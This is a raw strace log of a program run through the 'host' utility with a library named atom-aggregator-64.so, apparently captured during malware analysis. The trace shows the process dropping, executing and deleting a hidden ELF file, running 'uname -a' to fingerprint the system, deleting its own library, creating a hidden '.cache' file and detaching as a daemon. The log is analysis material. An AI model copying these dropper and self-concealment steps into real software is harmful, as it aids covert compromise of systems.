- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a7000
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a6000
- mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a4000
- arch_prctl(ARCH_SET_FS, 0x7f57db0a4720) = 0
- mprotect(0x7f57d7573000, 4096, PROT_READ) = 0
- mprotect(0x7f57d7796000, 4096, PROT_READ) = 0
- [...]
- mprotect(0x7f57db2df000, 4096, PROT_READ) = 0
- mprotect(0x7f57db0c1000, 4096, PROT_READ) = 0
- munmap(0x7f57db0b1000, 56122) = 0
- set_tid_address(0x7f57db0a49f0) = 18141
- set_robust_list(0x7f57db0a4a00, 0x18) = 0
- futex(0x7fff5d64a5ac, FUTEX_WAIT_BITSET_PRIVATE|FUTEX_CLOCK_REALTIME, 1, NULL, 7f57db0a4720) = -1 EAGAIN (Resource temporarily unavailable)
- rt_sigaction(SIGRTMIN, {0x7f57d9407ad0, [], SA_RESTORER|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x7f57d9407b60, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
- getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
- rt_sigaction(SIGINT, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGTERM, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGPIPE, {SIG_IGN, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGHUP, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [HUP INT TERM], NULL, 8) = 0
- socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
- close(3) = 0
- socket(PF_INET6, SOCK_STREAM, IPPROTO_IP) = 3
- getsockname(3, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0
- close(3) = 0
- socket(PF_FILE, SOCK_STREAM, 0) = 3
- close(3) = 0
- futex(0x7f57d9c7f8ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- futex(0x7f57d9c7f744, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- brk(0) = 0x7f57dd0d4000
- brk(0x7f57dd0f5000) = 0x7f57dd0f5000
- mmap(NULL, 266240, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db063000
- mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d6af2000
- mprotect(0x7f57d6af2000, 4096, PROT_NONE) = 0
- clone(Process 18146 attached
- child_stack=0x7f57d72f1fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d72f29d0, tls=0x7f57d72f2700, child_tidptr=0x7f57d72f29d0) = 18146
- [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d62f1000
- [pid 18141] mprotect(0x7f57d62f1000, 4096, PROT_NONE) = 0
- [pid 18141] clone(Process 18147 attached
- child_stack=0x7f57d6af0fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d6af19d0, tls=0x7f57d6af1700, child_tidptr=0x7f57d6af19d0) = 18147
- [pid 18141] brk(0x7f57dd11a000) = 0x7f57dd11a000
- [pid 18141] pipe([3, 5]) = 0
- [pid 18141] fcntl(3, F_GETFL) = 0 (flags O_RDONLY)
- [pid 18141] fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
- [pid 18141] epoll_create(64) = 6
- [pid 18141] epoll_ctl(6, EPOLL_CTL_ADD, 3, {EPOLLIN, {u32=3, u64=3}}) = 0
- [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d5af0000
- [pid 18141] mprotect(0x7f57d5af0000, 4096, PROT_NONE) = 0
- [pid 18141] clone(Process 18148 attached
- child_stack=0x7f57d62effd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d62f09d0, tls=0x7f57d62f0700, child_tidptr=0x7f57d62f09d0) = 18148
- [pid 18147] set_robust_list(0x7f57d6af19e0, 0x18) = 0
- [pid 18147] futex(0x7f57db06a07c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
- [pid 18146] set_robust_list(0x7f57d72f29e0, 0x18) = 0
- [pid 18146] futex(0x7f57db06808c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
- [pid 18148] set_robust_list(0x7f57d62f09e0, 0x18) = 0
- [pid 18148] epoll_wait(6, <unfinished ...>
- [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] futex(0x7f57daa802c0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] futex(0x7f57d9c7f6f0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] futex(0x7f57d9c7f820, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] futex(0x7f57daa802c4, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] brk(0x7f57dd13b000) = 0x7f57dd13b000
- [pid 18141] open("/usr/lib/ssl/openssl.cnf", O_RDONLY) = 7
- [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=10835, ...}) = 0
- [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18141] read(7, "#\n# OpenSSL example configuratio"..., 4096) = 4096
- [pid 18141] read(7, "Netscape crash on BMPStrings or "..., 4096) = 4096
- [pid 18141] read(7, " this to avoid interpreting an e"..., 4096) = 2643
- [pid 18141] read(7, "", 4096) = 0
- [pid 18141] close(7) = 0
- [pid 18141] munmap(0x7f57db0be000, 4096) = 0
- [pid 18141] futex(0x7f57d9a250ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] open("/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so", O_RDONLY) = 7
- [pid 18141] read(7, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320[\0\0\0\0\0\0"..., 832) = 832
- [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=93208, ...}) = 0
- [pid 18141] mmap(NULL, 2188288, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 7, 0) = 0x7f57d58d9000
- [pid 18141] mprotect(0x7f57d58ed000, 2097152, PROT_NONE) = 0
- [pid 18141] mmap(0x7f57d5aed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 7, 0x14000) = 0x7f57d5aed000
- [pid 18141] close(7) = 0
- [pid 18141] mprotect(0x7f57d5aed000, 4096, PROT_READ) = 0
- [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] futex(0x7f57daa7f8cc, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] futex(0x7f57daa7f9d0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] write(2, "Usage: host [-aCdlriTwv] [-c cla"..., 924Usage: host [-aCdlriTwv] [-c class] [-N ndots] [-t type] [-W time]
- [-R number] [-m flag] hostname [server]
- [...]
- ) = 924
- [pid 18141] time(NULL) = 1407227107
- [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
- [pid 18141] lstat("/home/mmd/0x02E/009/atom-aggregator-64.so", {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
- [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
- [pid 18141] open("/home/mmd/0x02E/009/1.18141", O_WRONLY|O_CREAT|O_TRUNC, 0777) = 7
- [pid 18141] write(7, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0`\200\4\0104\0\0\0"..., 106) = 106
- [pid 18141] close(7) = 0
- [pid 18141] clone(Process 18150 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18150
- [pid 18141] wait4(-1, Process 18141 suspended
- <unfinished ...>
- [pid 18150] execve("/home/mmd/0x02E/009/1.18141", ["/home/mmd/0x02E/009/1.18141"], [/* 20 vars */]) = 0
- [ Process PID=18150 runs in 32 bit mode. ]
- [pid 18150] _exit(99) = ?
- Process 18141 resumed
- Process 18150 detached
- [pid 18141] <... chroot resumed> ) = 18150
- [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
- [ Process PID=18141 runs in 64 bit mode. ]
- [pid 18141] unlink("/home/mmd/0x02E/009/1.18141") = 0
- [pid 18141] socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 7
- [pid 18141] connect(7, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
- [pid 18141] getsockname(7, {sa_family=AF_INET, sin_port=htons(55006), sin_addr=inet_addr("78.46.37.69")}, [16]) = 0
- [pid 18141] geteuid() = 1015
- [pid 18141] pipe2([9, 10], O_CLOEXEC) = 0
- [pid 18141] clone(Process 18151 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18151
- [pid 18141] close(10) = 0
- [pid 18141] fcntl(9, F_SETFD, 0) = 0
- [pid 18141] fstat(9, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
- [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18141] read(9, <unfinished ...>
- [pid 18151] close(9) = 0
- [pid 18151] dup2(10, 1) = 1
- [pid 18151] close(10) = 0
- [pid 18151] execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
- [pid 18151] brk(0) = 0xf3a000
- [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18151] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a86000
- [pid 18151] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- [pid 18151] open("/etc/ld.so.cache", O_RDONLY) = 9
- [pid 18151] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18151] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7f9096a78000
- [pid 18151] close(9) = 0
- [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18151] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
- [pid 18151] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- [pid 18151] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- [pid 18151] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7f90964de000
- [pid 18151] mprotect(0x7f9096660000, 2093056, PROT_NONE) = 0
- [pid 18151] mmap(0x7f909685f000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7f909685f000
- [pid 18151] mmap(0x7f9096864000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f9096864000
- [pid 18151] close(9) = 0
- [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a77000
- [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a76000
- [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a75000
- [pid 18151] arch_prctl(ARCH_SET_FS, 0x7f9096a76700) = 0
- [pid 18151] mprotect(0x7f909685f000, 16384, PROT_READ) = 0
- [pid 18151] mprotect(0x7f9096a88000, 4096, PROT_READ) = 0
- [pid 18151] munmap(0x7f9096a78000, 56122) = 0
- [pid 18151] getpid() = 18151
- [pid 18151] rt_sigaction(SIGCHLD, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] geteuid() = 1015
- [pid 18151] brk(0) = 0xf3a000
- [pid 18151] brk(0xf5b000) = 0xf5b000
- [pid 18151] getppid() = 18141
- [pid 18151] stat("/home/mmd/0x02E/009", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
- [pid 18151] stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
- [pid 18151] rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
- [pid 18151] rt_sigaction(SIGINT, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
- [pid 18151] rt_sigaction(SIGQUIT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
- [pid 18151] rt_sigaction(SIGTERM, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] clone(Process 18152 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f9096a769d0) = 18152
- [pid 18151] wait4(-1, <unfinished ...>
- [pid 18152] execve("/bin/uname", ["/bin/uname", "-a"], [/* 19 vars */]) = 0
- [pid 18152] brk(0) = 0xef7000
- [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18152] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac571000
- [pid 18152] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- [pid 18152] open("/etc/ld.so.cache", O_RDONLY) = 9
- [pid 18152] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18152] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7ffeac563000
- [pid 18152] close(9) = 0
- [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18152] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
- [pid 18152] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- [pid 18152] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- [pid 18152] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7ffeabfc9000
- [pid 18152] mprotect(0x7ffeac14b000, 2093056, PROT_NONE) = 0
- [pid 18152] mmap(0x7ffeac34a000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7ffeac34a000
- [pid 18152] mmap(0x7ffeac34f000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffeac34f000
- [pid 18152] close(9) = 0
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac562000
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac561000
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac560000
- [pid 18152] arch_prctl(ARCH_SET_FS, 0x7ffeac561700) = 0
- [pid 18152] mprotect(0x7ffeac34a000, 16384, PROT_READ) = 0
- [pid 18152] mprotect(0x606000, 4096, PROT_READ) = 0
- [pid 18152] mprotect(0x7ffeac573000, 4096, PROT_READ) = 0
- [pid 18152] munmap(0x7ffeac563000, 56122) = 0
- [pid 18152] brk(0) = 0xef7000
- [pid 18152] brk(0xf18000) = 0xf18000
- [pid 18152] uname({sys="Linux", node="1x111", ...}) = 0
- [pid 18152] fstat(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac570000
- [pid 18152] write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73) = 73
- [pid 18141] <... read resumed> "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 4096) = 73
- [pid 18141] close(9) = 0
- [pid 18141] wait4(18151, Process 18141 suspended
- <unfinished ...>
- [pid 18152] close(1) = 0
- [pid 18152] munmap(0x7ffeac570000, 4096) = 0
- [pid 18152] close(2) = 0
- [pid 18152] exit_group(0) = ?
- Process 18152 detached
- [pid 18151] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18152
- [pid 18151] --- SIGCHLD (Child exited) @ 0 (0) ---
- [pid 18151] rt_sigreturn(0x11) = 18152
- [pid 18151] exit_group(0) = ?
- Process 18141 resumed
- Process 18151 detached
- [pid 18141] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18151
- [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
- [pid 18141] munmap(0x7f57db0be000, 4096) = 0
- [pid 18141] unlink("/home/mmd/0x02E/009/atom-aggregator-64.so") = 0
- [pid 18141] open(".cache", O_RDWR) = -1 ENOENT (No such file or directory)
- [pid 18141] unlink(".cache") = -1 ENOENT (No such file or directory)
- [pid 18141] open(".cache", O_RDWR|O_CREAT|O_TRUNC, 0666) = 9
- [pid 18141] ftruncate(9, 12582912) = 0
- [pid 18141] mmap(NULL, 12582912, PROT_READ|PROT_WRITE, MAP_SHARED, 9, 0) = 0x7f57d4cd9000
- [pid 18141] rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_IGN, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
- [pid 18141] rt_sigaction(SIGCHLD, {SIG_IGN, [CHLD], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] rt_sigaction(SIGTSTP, {0x7f57dac9a0b4, [TSTP], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] rt_sigaction(SIGINT, {0x7f57dac9a0b4, [INT], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {0x7f57d9a58950, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
- [pid 18141] rt_sigaction(SIGTTOU, {SIG_IGN, [TTOU], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] rt_sigaction(SIGTTIN, {SIG_IGN, [TTIN], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] clone(Process 18153 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18153
- [pid 18141] exit_group(0) = ?
- Process 18141 attached (waiting for parent)
- [pid 18153] umask(0) = 022
- [pid 18153] setsid() = 18153
- [pid 18153] chroot("/") = -1 EPERM (Operation not permitted)
- [pid 18153] close(0) = 0
- [pid 18153] close(1) = 0
- [pid 18153] close(2) = 0
- [pid 18153] close(3) = 0
- [pid 18153] close(4) = 0
- [pid 18153] close(5) = 0
- [pid 18153] close(6) = 0
- [pid 18153] close(7) = 0
- [pid 18153] close(8) = 0
- [pid 18153] close(9) = 0
- [pid 18153] close(10) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(11) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(12) = -1 EBADF (Bad file descriptor)
- [...]
- [pid 18153] close(1019) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1020) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1021) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1022) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1023) = -1 EBADF (Bad file descriptor)
- [pid 18153] open("/dev/null", O_RDONLY) = 0
- [pid 18153] open("/dev/null", O_RDONLY) = 1
- [pid 18153] open("/dev/null", O_RDONLY) = 2
- [pid 18153] open("/dev/null", O_RDONLY) = 3
- [pid 18153] time(NULL) = 1407227107
- [pid 18153] socket(PF_NETLINK, SOCK_RAW, 0) = 4
- [pid 18153] bind(4, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 0
- [pid 18153] getsockname(4, {sa_family=AF_NETLINK, pid=18153, groups=00000000}, [12]) = 0
- [pid 18153] time(NULL) = 1407227107
- [pid 18153] sendto(4, "\24\0\0\0\26\0\1\3\343\224\340S\0\0\0\0\0\0\0\0", 20, 0, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 20
- [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"0\0\0\0\24\0\2\0\343\224\340S\351F\0\0\2\10\200\376\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 108
- [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"\24\0\0\0\3\0\2\0\343\224\340S\351F\0\0\0\0\0\0\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 20
- [pid 18153] close(4) = 0
- [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
- [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
- [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
- [pid 18153] close(4) = 0
- [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
- [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
- [pid 18153] close(4) = 0
- [pid 18153] open("/etc/nsswitch.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
- [pid 18153] close(4) = 0
- [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18153] open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
- [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200!\0\0\0\0\0\0"..., 832) = 832
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=47616, ...}) = 0
- [pid 18153] mmap(NULL, 2143624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d4acd000
- [pid 18153] mprotect(0x7f57d4ad8000, 2093056, PROT_NONE) = 0
- [pid 18153] mmap(0x7f57d4cd7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0xa000) = 0x7f57d4cd7000
- [pid 18153] close(4) = 0
- [pid 18153] mprotect(0x7f57d4cd7000, 4096, PROT_READ) = 0
- [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
- [pid 18153] open("/etc/host.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=9, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "multi on\n", 4096) = 9
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] futex(0x7f57d90a0324, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18153] open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=495, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 495
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
- [pid 18153] close(4) = 0
- [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
